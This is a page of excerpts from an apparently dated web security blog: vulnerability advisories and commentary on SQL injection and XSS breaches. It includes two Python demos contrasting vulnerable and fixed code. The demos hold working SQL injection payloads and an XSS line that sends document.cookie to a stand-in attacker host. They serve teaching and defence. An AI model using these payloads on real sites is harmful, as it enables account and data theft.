-
1) HP Power Manager Management Web Server Login Remote Code Execution Vulnerability HP Power Manager is susceptible to a remote code execution vulnerability via the login form of the web based management web server due to improper bounds-checking of user-supplied data. Exploitation of this vulnerability...
-
1) TYPO3 Core Multiple Vulnerabilities TYPO3 is susceptible to multiple remote vulnerabilities including SQL-injection, Cross-Site Scripting, information disclosure, frame and session hijacking, and shell-command-execution issues. Each of these issues is exploitable via a browser, although some might...
-
1) Novell GroupWise WebAccess Cross-Site Scripting Vulnerability Novell GroupWise WebAccess is susceptible to a Cross-Site Scripting vulnerability. An attacker can leverage this vulnerability to execute script code in the browser of an unsuspecting user in context of the affected application, possibly...
-
New studies have gone a long way in confirming that certain web application security trends are accelerating. The SANS Top Cyber Security Risks report reveals that a full 60% of Internet attacks are now conducted against web applications. It's no longer unpatched operating systems that provide attackers...
-
1) Ruby on Rails Form Helpers Unicode String Handling Cross-Site Scripting Vulnerability Ruby on Rails is susceptible to a Cross-Site Scripting vulnerability. An attacker can leverage Cross-Site Scripting to execute script code in the browsers of unsuspecting users in context of the affected application...
-
Court papers recently filed in conjunction with the indictment of Albert Gonzalez reveal that SQL Injection attacks were behind the data breach that allowed hackers to steal massive amounts of data from Heartland Payment Systems, TJX, and other businesses. Over 130 million credit and debit card numbers...
-
1) Oracle Config Management Multiple SQL-injection Vulnerabilities Oracle Config Management is susceptible to multiple SQL Injection vulnerabilities. SQL Injection can give an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system...
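The two items above (the Heartland/TJX breach and the Oracle Config Management advisory) describe what SQL injection lets an attacker do but not how the query actually gets bent. The following is an added example, not code from this page or from any of the products it lists; it uses Python's built-in sqlite3 against a constructed in-memory credential table so it runs offline. It shows a login query built by string concatenation beside the same query with bound parameters, and drives three classic payloads through both: a tautology, a comment that discards the password check, and a UNION that pulls a different column through the same query.

```python
import sqlite3

# Constructed sample credential table (not data from the original page).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("admin", "correct-horse")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that splices user input straight into the SQL text (the bug)."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Same check with bound parameters: input can never change the query structure."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run the payloads against both versions and return what each one yields."""
    conn = make_db()
    results = {}
    # 1. Tautology: the password field rewrites the WHERE clause to
    #    "... AND password = 'x' OR '1'='1'", which matches every row.
    results["tautology"] = login_vulnerable(conn, "admin", "x' OR '1'='1")
    # 2. Comment-out: the trailing "--" turns the password check into a comment.
    results["comment"] = login_vulnerable(conn, "admin'--", "wrong")
    # 3. UNION: return a different column (here the stored passwords) through
    #    the same SELECT, which is how data is exfiltrated row by row.
    results["union"] = login_vulnerable(
        conn, "x' UNION SELECT password FROM users--", "y"
    )
    # The parameterized version treats every payload as a literal string, so
    # none of them match anything; only the real credential does.
    results["param_tautology"] = login_parameterized(conn, "admin", "x' OR '1'='1")
    results["param_comment"] = login_parameterized(conn, "admin'--", "wrong")
    results["param_legit"] = login_parameterized(conn, "admin", "correct-horse")
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-16s %s" % (name, rows))
```

The fix is not escaping quotes in application code; it is keeping data out of the query text altogether, which is what the parameterized version does. Note that sqlite3 refuses stacked statements in `execute()`, so the stored-procedure and OS-command escalation the advisory alludes to is not reproduced here; on databases that allow stacked queries the same concatenation bug is all the attacker needs.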
-
1) Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability Sun Java System Web Server is susceptible to a Cross-Site Scripting vulnerability. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those...
-
1) Multiple Symantec Products Log Viewer Script Injection Vulnerabilities Multiple Symantec Products are susceptible to browser-exploitable script injection vulnerabilities due to improper sanitization of user-supplied input used in dynamically created content. Successful exploitation would give an attacker...
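The Rails form-helper, Sun reverse-proxy and Symantec log-viewer items above all come down to the same defect: user-supplied input placed into dynamically generated markup without encoding for the context it lands in. The following is an added example, not code from this page or from any of those products; the payloads and the benign Unicode value are constructed for the demonstration. It renders the same input into two HTML contexts, text content and an attribute value, and shows why encoding that only handles `<`, `>` and `&` is not enough once the input sits inside a quoted attribute.

```python
import html

# Constructed inputs (not from the original page): a benign Unicode value, a
# payload aimed at text content, and a payload aimed at an attribute value.
BENIGN = "Zoë's café"
TEXT_PAYLOAD = "<script>new Image().src='http://attacker.invalid/?'+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_text_unsafe(value):
    """Reflect the value into element text with no encoding (the bug)."""
    return "<p>You searched for: %s</p>" % value


def render_text_safe(value):
    """Same, with HTML entity encoding; non-ASCII text is left intact."""
    return "<p>You searched for: %s</p>" % html.escape(value)


def render_attr_unsafe(value):
    """Form-helper style output that echoes the value into an attribute (the bug)."""
    return '<input type="text" name="q" value="%s">' % value


def render_attr_partial(value):
    """quote=False encodes only < > &; inside a quoted attribute that still
    lets the attacker close the quote and add event-handler attributes."""
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=False)


def render_attr_safe(value):
    """Attribute context needs the quotes encoded too (quote=True)."""
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)


def breaks_out(rendered):
    """Crude check used only by this demo: does the markup contain a raw
    <script tag or an injected onfocus handler?  Not a general XSS detector."""
    return "<script" in rendered or ' onfocus="' in rendered


def demo():
    """Return, per renderer, whether the payload escaped its intended context."""
    return {
        "text_unsafe": breaks_out(render_text_unsafe(TEXT_PAYLOAD)),
        "text_safe": breaks_out(render_text_safe(TEXT_PAYLOAD)),
        "attr_unsafe": breaks_out(render_attr_unsafe(ATTR_PAYLOAD)),
        "attr_partial": breaks_out(render_attr_partial(ATTR_PAYLOAD)),
        "attr_safe": breaks_out(render_attr_safe(ATTR_PAYLOAD)),
        # Encoding must not mangle legitimate non-ASCII input.
        "unicode_kept": "Zoë" in render_text_safe(BENIGN) and "café" in render_text_safe(BENIGN),
    }


if __name__ == "__main__":
    for name, escaped in demo().items():
        print("%-14s %s" % (name, escaped))
```

The practical rule this illustrates: encode at the point of output, for the exact context (text, attribute, URL, JavaScript string), rather than trying to strip "bad" characters on input. JavaScript-string and URL contexts need their own encoders; `html.escape` covers only the two shown here.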
-
Paris Hilton’s website was infected with some pretty nasty malware over the past weekend. ScanSafe (who discovered the compromise) said that over 15,000 sites were detected to have this malware installed, including an ad on MLB.com. So far, most AV products aren't stopping it, either. Visitors to...
-
This week saw the release of the “Top 25 Most Dangerous Programming Errors” list from MITRE and SANS. At first skim, I nearly discarded it as just an effort to pad resumes—after all, do we really need another “top X” list (every group with a barely pronounceable acronym has their own)? Weighing heavily...
-
Web application security is undeniably a hot topic these days. Awareness is growing, and developers are starting to take notice of the security shortfalls in their code. Awareness of attacks like SQL injection, cross-site scripting, and CSRF (Cross-Site Request Forgery) is starting to spread...
-
Not every company has consumer data contained within its web applications. I get that. Logic fails me, however, when someone tries to explain to me why, because they don't have consumer data (or other critical data that can be "stolen" from their applications), they really don't need...
-
You have likely been tracking the mass SQL Injections that are currently sweeping through the net. Just last night I was shopping on www.ihomeaudio.com when I noticed they had been injected (they have since fixed their site). HP started to observe these attacks in January. They spread to over 500,000...